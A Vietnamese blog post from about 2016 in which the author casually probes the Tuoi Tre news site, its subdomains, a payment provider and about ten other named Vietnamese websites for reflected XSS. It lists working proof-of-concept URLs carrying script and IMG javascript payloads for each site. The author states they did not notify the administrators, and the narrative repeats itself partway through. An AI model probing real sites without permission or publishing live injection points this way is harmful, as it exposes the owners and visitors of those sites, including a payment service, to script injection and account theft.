Hôm nay vừa đi tiêm thuốc về vì mình đang ốm phải đi điều trị ngoại trú thì bị thằng bạn hù dọa và đưa cho link một cháu bẽ bị bệnh nhìn rất kinh sợ trên tuoitre ở cái mục Tin nóng 24h ngày 26-8-2016 xem song thấy ghê thật và run. sau đó lên một group chat và thấy nguoilaodong.com.vn bị lỗi xss thì vô tình đã nảy ra một ý tưởng trong khi xem video trên là liệu tuổi trẻ có bị lỗi như vậy hay không? vì trước kia tuổi trẻ đã một lần bị thành viên của vhb tìm ra lỗi xss nên tôi không dám chắc điều này!
bắt đầu check thì trên trang tuổi trẻ online thì chả có vẹo gì và bắt đầu chuyển về trang chủ của nó và thử nghiệm xem sao xem có không thì tôi đã thấy lỗi xss ngay ở khung tìm kiếm trên trang chủ của báo tuổi trẻ
vậy là báo tuổi trẻ đã bị lỗi XSS không dừng lại ở trang chủ tiếp tục mình tìm xem lỗi có thể có ở đâu nữa không? và bắt đầu hứng lên mò toàn bộ subdomain của báo tuổi trẻ xem có lỗi ở đoạn nào nữa không
Khi mò ra được các subdomain thì mình bắt tay vào check thitruong.tuoitre.vn thử nhưng nó không hề ra lỗi xss nào cả
Nhưng khi chèn các thẻ IMG vào để khai thác thì nó trả ra lỗi show toàn bộ hàm
Và rồi thì mò sang một số tờ báo mạng của việt nam và check lỗi XSS kết quả có thêm một vài site dính đòn XSS
motthegioi.vn
techz.vn
hongyen.vn
giangduydat.vn
mainguyen.vn
bongda.com.vn
tietkiemxanghoangson.com.vn
cuocsongquanhta.vn
news.go.vn
stockbiz.vn
Và một số đài truyền hình cũng bị lỗi tương tự!
và tôi thấy xss khắp mọi nơi rồi thấy chán chả buồn mò xem web của lỗi nữa và cũng chả buồn viết mail vì nó quá nhiều mà tâm trạng cũng không tốt nên thôi chả viết mail làm gì mà có viết mấy bố admin có chịu đọc đâu nên thôi!
bắt đầu check thì trên trang tuổi trẻ online thì chả có vẹo gì và bắt đầu chuyển về trang chủ của nó và thử nghiệm xem sao xem có không thì tôi đã thấy lỗi xss ngay ở khung tìm kiếm trên trang chủ của báo tuổi trẻ
http://tuoitre.vn/tim-kiem/song-khoe/?q=%20%3Cscript%3Ealert%281%29;%3C/script%3E
vậy là báo tuổi trẻ đã bị lỗi XSS không dừng lại ở trang chủ tiếp tục mình tìm xem lỗi có thể có ở đâu nữa không? và bắt đầu hứng lên mò toàn bộ subdomain của báo tuổi trẻ xem có lỗi ở đoạn nào nữa không
Khi mò ra được các subdomain thì mình bắt tay vào check thitruong.tuoitre.vn thử nhưng nó không hề ra lỗi xss nào cả
http://thitruong.tuoitre.vn/tim-kiem?headerCategorySearch=&keyword=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
Nhưng khi chèn các thẻ IMG vào để khai thác thì nó trả ra lỗi show toàn bộ hàm
http://thitruong.tuoitre.vn/tim-kiem?headerCategorySearch=&keyword=<IMG SRC%3D"javascript%3Aalert('XSS')%3B">
Và rồi tôi tìm tới smtp.tuoitre.vn dự là webmail của báo tuổi trẻ và phát hiện ra lỗi chứng chỉ https
tiếp theo tôi vào trang pay.tuoitre.vn để check nhưng thật đắng lòng không có chỗ nào mà check cả tuy nhiên lại có một cái số cái rất thú vị
sau đó tôi f5 điền bừa thông tin thì thấy
tôi tự hỏi vban là bọn nào có liên quan gì tới tuoitre hay không? và nảy sinh test thử luôn vban thì kết quả nhẽ làm mình té ghế. Nó cũng bị lỗi XSS ( Vban là Công ty Cổ phần Giải pháp Thanh toán Việt Nam)
vậy là từ việc check tuổi trẻ thì tôi đã chuyển qua mò ra lỗi trên một website thanh toán online
motthegioi.vn
techz.vn
http://www.techz.vn/search?q=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
hongyen.vn
http://www.hongyen.vn/tim-kiem-san-pham?p=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
giangduydat.vn
http://www.giangduydat.vn/s.php?q=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
mainguyen.vn
http://www.mainguyen.vn/search/?q=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
bongda.com.vn
http://www.bongda.com.vn/%3Cscript%3Ealert%281%29;%3C/script%3E-search/
tietkiemxanghoangson.com.vn
http://tietkiemxanghoangson.com.vn/search.php?keyword=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&searchid=all
cuocsongquanhta.vn
news.go.vn
http://news.go.vn/SearchResult.aspx?s=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&period=top&page=1
stockbiz.vn
http://www.stockbiz.vn/SearchNews.aspx?q=%3Cscript%3Ealert%281%29%3b%3C%2fscript%3E
Và một số đài truyền hình cũng bị lỗi tương tự!
và tôi thấy xss khắp mọi nơi rồi thấy chán chả buồn mò xem web của lỗi nữa và cũng chả buồn viết mail vì nó quá nhiều mà tâm trạng cũng không tốt nên thôi chả viết mail làm gì mà có viết mấy bố admin có chịu đọc đâu nên thôi!
0 nhận xét:
Post a Comment